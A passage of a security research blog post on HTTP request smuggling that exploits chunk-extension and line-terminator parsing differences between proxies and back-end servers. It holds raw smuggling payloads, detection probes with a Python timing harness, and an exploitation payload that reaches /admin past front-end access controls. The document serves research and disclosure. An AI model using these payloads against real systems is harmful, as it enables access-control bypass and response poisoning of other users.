</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">e;foo=bar<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>some more data<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>
</div>
</div>

<p>Using these optional chunk extensions, a sender can attach metadata to each individual chunk they send. This is exemplified in the request above, in which the metadata <code class="language-plaintext highlighter-rouge">foo=bar</code> is attached to the second chunk. To be clear, these chunk extensions are <strong>not</strong> part of the data delivered to the web application – they’re metadata meant for the server processing the request.</p>

<p>So what are these chunk extensions actually used for? The answer is simple: <em>nothing</em>. No HTTP implementation makes any meaningful use of chunk extensions – servers ignore them and clients don’t send them. It seems the protocol designers simply anticipated a need that never materialized. To put it bluntly: <strong><em>nobody cares about chunk extensions</em></strong>.</p>

<p>Nothing makes this simple truth more apparent than reviewing the source code of a couple of HTTP implementations. A consistent behavior you’ll find is that HTTP parsers simply consume the chunk extensions, discarding the contents. I believe a common sentiment among developers tasked with writing such parsing logic is quite nicely summarized in <a href="https://github.com/golang/go/blob/1d45a7ef560a76318ed59dfdb178cecd58caf948/src/net/http/internal/chunked.go#L193-L199">this function</a> found in the net/http package of the Golang standard library.</p>

<div class="language-golang highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">func</span> <span class="n">removeChunkExtension</span><span class="p">(</span><span class="n">p</span> <span class="p">[]</span><span class="kt">byte</span><span class="p">)</span> <span class="p">([]</span><span class="kt">byte</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">p</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">bytes</span><span class="o">.</span><span class="n">Cut</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">semi</span><span class="p">)</span>
	<span class="c">// TODO: care about exact syntax of chunk extensions? We're</span>
	<span class="c">// ignoring and stripping them anyway. For now just never</span>
	<span class="c">// return an error.</span>
	<span class="k">return</span> <span class="n">p</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To an HTTP implementer, the chunk extension is indeed nothing more than a nuisance one has to account for in order to comply with the HTTP standard. However, the RFC is actually quite particular about what characters are allowed in chunk extensions and the syntax rules are not exactly straightforward. As a result, <strong>most HTTP implementations do not strictly adhere to the chunk extension specification</strong>. And this makes sense – why would they, when they’re just “ignoring and stripping them anyway”, as one Golang developer put it so aptly?</p>

<h4 id="a-thought-experiment">A thought experiment</h4>
<p>Parsers may choose to throw away chunk extensions, but they do still have to parse them. And as we’ve already established, parsers are inclined to do so somewhat carelessly, since the contents are discarded anyway. This is fertile ground for misinterpretations. Let us explore that further with a simple thought experiment.</p>

<p>Imagine that you’re an HTTP parser, dutifully working your way through a chunk header. You encounter a semicolon, signaling the start of a chunk extension. Now, in your parsing of this chunk extension (which you intend to fully ignore), you come across a lone <code class="language-plaintext highlighter-rouge">\n</code> character. This is a bit unusual, and what you’re really looking for is the CRLF terminator of the chunk header. What do you do?</p>

<ol>
  <li>
    <p><strong>Allow it</strong>: You treat the <code class="language-plaintext highlighter-rouge">\n</code> like any other byte – you ignore it and continue searching for the CRLF sequence.</p>
  </li>
  <li>
    <p><strong>Interpret it as a line terminator</strong>: The client might not be fully compliant, but they obviously intended the <code class="language-plaintext highlighter-rouge">\n</code> to be a line terminator – you interpret the <code class="language-plaintext highlighter-rouge">\n</code> as the end of the chunk header and start parsing the body.</p>
  </li>
  <li>
    <p><strong>Reject the request</strong>: This request appears to be malformed – you respond with a client error.</p>
  </li>
</ol>

<p>Let’s go through these options one by one.</p>

<p>It’s easy to see how a parser might come to choose option 1 without the author even realizing it. If it’s only looking for the terminating CRLF sequence without any intention of caring about the chunk extension, it will plausibly just throw away the <code class="language-plaintext highlighter-rouge">\n</code> along with any other byte (legal or otherwise) that might exist between the <code class="language-plaintext highlighter-rouge">;</code> and <code class="language-plaintext highlighter-rouge">\r\n</code> sequences. Control characters like newlines are not allowed in chunk extensions, and of course allowing illegal characters is incorrect behavior, so this option is in violation of the RFC.</p>

<p>The second option – interpreting the newline as a line terminator – might at a glance appear valid. After all, <a href="https://datatracker.ietf.org/doc/html/rfc9112#section-2.2-3">the RFC allows interpreting lone LFs as line terminators in the request line and headers</a>, so why not the chunk headers? Unfortunately, no such exception exists for the chunk lines; <strong>only the complete CRLF is a valid line terminator in the chunked body</strong>. You might not feel convinced that this is true, and I will grant you that it is a strange complication, especially since it’s not even explicitly addressed in the specification. However, <a href="https://www.rfc-editor.org/errata/eid7633">this errata review from 2023</a> confirms that the difference in allowed line terminators is in fact by design. As such, we conclude that option 2 is also in violation of the RFC.</p>

<p>Indeed, the only technically correct course of action is option 3: rejecting the request.</p>

<h3 id="the-vulnerability">The vulnerability</h3>
<p>Either of the two lenient parsing options is a harmless behavior on its own, but consider an environment with both a front-end reverse proxy (e.g. a load balancer, cache, or WAF) and a back-end web server. If the proxy in such an architecture applies one of the two incorrect interpretations while the server applies the other, we’re left with a parsing discrepancy. This discrepancy can be exploited to construct ambiguous HTTP requests, enabling <em>HTTP request smuggling</em> attacks.</p>

<p>There are two variants of this type of request smuggling vulnerability. I will refer to these as TERM.EXT and EXT.TERM:</p>
<ol>
  <li><strong>The terminator-extension (or TERM.EXT) variant</strong>: The proxy interprets a certain sequence in a chunk extension as a line terminator, and the server treats it as part of the chunk extension.</li>
  <li><strong>The extension-terminator (or EXT.TERM) variant</strong>: The server allows a certain sequence in a chunk extension that the proxy interprets as a line terminator.</li>
</ol>

<p>While the newline character <code class="language-plaintext highlighter-rouge">\n</code> is perhaps the best example of a sequence that can cause a parsing discrepancy, these techniques are not limited to <code class="language-plaintext highlighter-rouge">\n</code>; other potentially ambiguous sequences such as <code class="language-plaintext highlighter-rouge">\rX</code> and <code class="language-plaintext highlighter-rouge">\r</code> are equally exploitable, though encountered far less often.</p>

<p>An interesting thing to note is that these vulnerabilities fundamentally differ from conventional request smuggling vulnerabilities in that they do not rely on confusion between the <code class="language-plaintext highlighter-rouge">Content-Length</code> and <code class="language-plaintext highlighter-rouge">Transfer-Encoding</code> headers. This is good news for attackers, because while <a href="https://datatracker.ietf.org/doc/html/rfc9112#section-6.3-2.3">the RFC forbids an intermediary from forwarding both these headers</a>, chunk extensions can legally be forwarded. Many intermediaries do remove or normalize them, though.</p>

<h4 id="termext">TERM.EXT</h4>
<p>Let us first take a look at a simple TERM.EXT request smuggling payload. Below, both interpretations are shown using highlights to display the perceived chunk boundaries.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
xx<span class="http-line-break">\r\n</span>
</span>45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">EXT interpretation (server)</p>
</div>
</div>
</div>

<p>The key thing to notice in this request is of course the newline in the chunk extension, which causes the parsing discrepancy. The proxy, interpreting the newline as a line terminator, will consider <code class="language-plaintext highlighter-rouge">45</code> the size of the second chunk, whereas the server will consider it the content of the first chunk. As such, a second pipelined request can be hidden in what the proxy perceives as the body of the second chunk.</p>

<p><em><strong>Note</strong>: The vulnerability I now presumptuously have coined ‘TERM.EXT’ was actually <a href="https://github.com/mattiasgrenfeldt/bachelors-thesis-http-request-smuggling">documented</a> back in 2021 by Mattias Grenfeldt and Asta Olofsson. I’ve taken the liberty of naming it to reflect its place in the broader family of chunk parsing vulnerabilities.</em></p>

<h4 id="extterm">EXT.TERM</h4>
<p>The EXT.TERM variant has to my knowledge never been documented before, although it follows quite naturally from the TERM.EXT technique. Let us have a look at a payload equivalent to the TERM.EXT payload above.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">45;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
AAAAAAAAAAAAA... <i>[69]</i><span class="http-line-break">\r\n</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">EXT interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">45;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAAAAAAAAAA... <i>[69]</i><span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (server)</p>
</div>
</div>
</div>

<p>Much like in the TERM.EXT payload, the parsing discrepancy is introduced by the illegal <code class="language-plaintext highlighter-rouge">\n</code> in the chunk extension. The proxy ignores the sequence of 69 (0x45) A’s in the perceived chunk extension, whereas the server considers it the content of the first chunk. The remaining data is therefore interpreted as the chunk body by the proxy, but as a pipelined request by the server.</p>

<h3 id="what-about-chunk-bodies">What about chunk bodies?</h3>
<p>The attentive reader may have noticed that the TERM.EXT and EXT.TERM vulnerabilities are not so much inconsistencies in the parsing of <em>chunk extensions</em> as they are inconsistencies in the parsing of <em>line terminators</em>. The chunk extension itself is nothing more than a convenient place to hide a sequence of padding bytes (like <code class="language-plaintext highlighter-rouge">'xx'</code> or <code class="language-plaintext highlighter-rouge">'AAAAA...'</code>). In this light, it is only natural to ask: are line terminator parsing discrepancies in the chunk <em>body</em> not exploitable as well?</p>

<p>At first glance, the obvious answer appears to be <em>no</em>, precisely because there is no equivalent to the chunk extension in the chunk body. However, I have found that given the presence of one additional fairly common parsing leniency, we can extend the TERM.EXT and EXT.TERM techniques to exploit similar flaws in the line terminator parsing of the chunk body.</p>

<p>The trick is to use <em>oversized chunks</em> – that is, chunks with larger bodies than indicated in the chunk header. For example, consider the invalid chunked message body below:</p>

<div style="max-width: 100%; overflow-x: auto;">
<pre><code>5<span class="http-line-break">\r\n</span>
AAAAA<span class="http-highlight-one-compl" style="padding: 0 0px;">XXX</span><span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>
</div>

<p>Some HTTP servers and proxies accept such malformed chunks and simply ignore the trailing excess bytes, which I will henceforth refer to as the <em>spill</em>. By placing a sequence that one parser interprets as a line terminator in what another parser interprets as a spill, we obtain an exploitable parsing discrepancy. This allows us to define a new set of complementary parsing vulnerabilities that, to my knowledge, have never been documented before.</p>

<h4 id="termspill">TERM.SPILL</h4>
<p>Let us first consider the scenario in which the server accepts oversized chunk bodies. To exploit this leniency, we must then find a sequence that only the proxy recognizes as a line terminator.</p>

<p>In my experience, parsers are even more lenient regarding the CRLF after the chunk body. Since only the sequence <code class="language-plaintext highlighter-rouge">\r\n</code> is valid in this location, some parsers do not even bother to check it and just accept any 2-byte sequence. Here’s an example payload effective against a proxy using such a parser.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAAXX<span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAAXX<span class="http-highlight-text">chunk body</span>
45<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">SPILL interpretation (server)</p>
</div>
</div>
</div>

<p>On the front-end, the <code class="language-plaintext highlighter-rouge">XX</code> sequence is interpreted as a CRLF, and the subsequent <code class="language-plaintext highlighter-rouge">45</code> sequence is interpreted as the size of the next chunk. On the back-end, the entire <code class="language-plaintext highlighter-rouge">XX45</code> sequence is interpreted as spill bytes and thus ignored. Therefore, a second pipelined request can be hidden in what the proxy perceives as the body of the second chunk.</p>

<h4 id="spillterm">SPILL.TERM</h4>
<p>In the opposite scenario, the proxy ignores spills in chunk bodies and we must find a sequence to place in a spill that only the server interprets as a line terminator. Let us this time suppose that a <code class="language-plaintext highlighter-rouge">\rX</code> sequence is ignored on the front-end but interpreted as a line terminator on the back-end.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAA<span class="http-line-break">\r</span>X<span class="http-highlight-text">chunk body</span>
2<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">SPILL interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAA<span class="http-line-break">\r</span>X<span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (server)</p>
</div>
</div>
</div>

<p>Here, the <code class="language-plaintext highlighter-rouge">\rX2</code> spill is ignored by the proxy, but interpreted as a CRLF followed by a chunk size of <code class="language-plaintext highlighter-rouge">2</code> on the back-end. Consequently, the <code class="language-plaintext highlighter-rouge">45</code> sequence is interpreted as a chunk size by the proxy, but as data by the back-end server, once again allowing a second request to be hidden from the proxy.</p>

<h3 id="a-short-note-on-normalization">A short note on normalization</h3>
<p>Normalization is the natural-born enemy of all four kinds of request smuggling we’ve discussed in the previous sections. Indeed, if the proxy strips chunk extensions and ‘spills’, replaces all line terminators with <code class="language-plaintext highlighter-rouge">\r\n</code>, or just rewrites the entire request with a <code class="language-plaintext highlighter-rouge">Content-Length</code> header, then it doesn’t really matter what parsing leniencies either the proxy or server has; it’s just not possible to cause a parsing discrepancy.</p>

<p>It is tempting to conclude from the above that a proxy that normalizes the chunked body before forwarding the request is immune to these sorts of attacks. One might even go as far as to claim that such a proxy <em>should</em> parse leniently in the name of robustness, as is decreed by <a href="https://en.wikipedia.org/wiki/Robustness_principle">Postel’s Law</a>:</p>

<blockquote>
  <p>be conservative in what you send, be liberal in what you accept</p>
</blockquote>

<p>The trouble with this assumption is that a proxy does not know in advance whether any additional proxies will be placed in front of it – it is not uncommon to chain proxies with different purposes in modern architectures. In such environments, a chunk-normalizing proxy with one of the parsing flaws we’ve discussed could still be exploitable for request smuggling if a proxy in front of it is affected by the complementary parsing flaw.</p>

<h3 id="black-box-detection">Black-box detection</h3>
<p>Vulnerable combinations of servers and proxies can quite easily be identified by analyzing source code, but in practice we rarely have the luxury of such access to our target’s systems. To discover these vulnerabilities in the wild, we need generic probes.</p>

<p>In order to design such probes, we can adapt the <a href="https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn#detect">timeout-based detection methods</a> developed by James Kettle in his 2019 request smuggling <a href="https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn">research</a>. The key idea here is to construct an HTTP request that will (1) cause a vulnerable front-end to drop the last portion of the request body and (2) cause a vulnerable back-end to hang if (and only if) some of the body doesn’t arrive. This concept can quite easily be adapted to our little family of chunk parsing vulnerabilities.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">
<pre><code>POST / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
10<span class="http-line-break">\r\n</span>
1f<span class="http-line-break">\r\n</span>
AAAABBBBCCCC<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one">DDDDEEEEFFFF<span class="http-line-break">\r\n</span><span style="white-space: nowrap;" class="http-highlight-text">dropped by front-end</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span></code></pre>
<p style="text-align: center; font-weight: bold;">TERM.EXT probe</p>
</div>

<div style="flex: 1;">
<pre><code>POST / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
22<span class="http-line-break">\r\n</span>
c<span class="http-line-break">\r\n</span>
AAAABBBBCCCC<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one">DDDDEEEEFFFF<span class="http-line-break">\r\n</span><span class="http-highlight-text">dropped by front-end</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span></code></pre>
<p style="text-align: center; font-weight: bold;">EXT.TERM probe</p>
</div>
</div>
</div>

<p>In each of the example probes above, a proxy with the corresponding parsing flaw will interpret the first <code class="language-plaintext highlighter-rouge">0\r\n\r\n</code> sequence as the terminating zero-sized chunk, causing it to drop the part of the request marked in red. A vulnerable server receiving the request without the last part will expect more data to arrive, causing it to hang and eventually time out. This results in an easily identifiable time delay.</p>
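<p>The timing measurement itself needs nothing more than a raw socket. The sketch below is a minimal, hypothetical harness (host, port, and the timeout threshold are placeholders) that delivers one of the probes above as raw bytes and reports how long the target takes to respond.</p>

```python
import socket
import time

def time_probe(host: str, port: int, payload: bytes, timeout: float = 10.0) -> float:
    """Send a raw HTTP payload and measure how long the response takes."""
    start = time.monotonic()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(payload)
            # A desynced back-end waits for body bytes that never arrive,
            # so this recv() blocks until the timeout fires.
            sock.recv(4096)
    except socket.timeout:
        pass
    return time.monotonic() - start
```

<p>A response time that pins to the timeout, compared against a fast baseline request, suggests that the front-end dropped the probe’s tail and the back-end was left waiting for it.</p>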

<p>I’ve written a scanner script I call <a href="https://github.com/JeppW/smugchunks">smugchunks</a> for automating this vulnerability discovery technique. For those interested, its source code is publicly available on GitHub and includes payloads for TERM.SPILL and SPILL.TERM detection as well.</p>

<h3 id="exploitation">Exploitation</h3>
<p>Exploiting chunk parser differentials is really not much different from exploiting any other kind of request smuggling vulnerability; they can be used for the same attacks you know and love, such as circumventing front-end security controls and serving malicious responses to unsuspecting live clients.</p>

<p>In the interest of empowering readers to apply these techniques in practice, I’ve included a brief discussion on exploitation with some examples here. If you’re already well-versed in request smuggling, you will probably find nothing new in this section – feel free to skip ahead.</p>

<h4 id="bypassing-front-end-rules">Bypassing front-end rules</h4>
<p>As a smuggled request (by its very definition) is not interpreted as a request by the front-end proxy, it will not be subjected to any access control rules the front-end may enforce, nor will the front-end rewrite the headers of the request as it would normally. Depending on the nature and purpose of the proxy in question, bypassing these front-end operations can be hugely impactful.</p>

<p>Consider, for example, a front-end that restricts access to <code class="language-plaintext highlighter-rouge">/admin</code>. By exploiting a TERM.EXT vulnerability, we can circumvent this access control rule using a payload like the one below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<pre><code>GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
47<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span> 
<span class="http-line-break">\r\n</span>
GET /admin HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span> 
</code></pre>
</div>

<p>This simple payload, however, suffers from a major limitation. While the smuggled request <em>will</em> reach the back-end server, its response will not be returned to us. This is because the proxy believes it received only a single request, so it will usually not reply with two responses.</p>

<p>Fortunately, we can quite easily overcome this apparent blindness with a minor modification to the payload. We simply replace the <code class="language-plaintext highlighter-rouge">Transfer-Encoding</code> header with an oversized <code class="language-plaintext highlighter-rouge">Content-Length</code> header in the smuggled request and append a second pipelined request. When we make this change, we must also remember to update the chunk size accordingly.</p>
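<p>The arithmetic is easy to get wrong by hand, so it is worth recomputing. The snippet below simply counts the bytes of the two highlighted regions of the payload: the chunk size must cover everything from the fake terminal chunk through the smuggled headers, and the smuggled <code class="language-plaintext highlighter-rouge">Content-Length</code> must cover the pipelined follow-up request.</p>

```python
# Recomputing the sizes used in the payload (bytes as the back-end sees them).
smuggled_chunk = (
    b"0\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 40\r\n"
)
follow_up = (
    b"0\r\n"
    b"\r\n"
    b"GET / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"\r\n"
)
print(hex(len(smuggled_chunk)))  # 0x3f -- the chunk size sent to the front-end
print(len(follow_up))            # 40   -- the smuggled Content-Length
```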

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px">
<div style="flex: 1;">
<pre><code><span class="http-highlight http-highlight-one">GET / HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
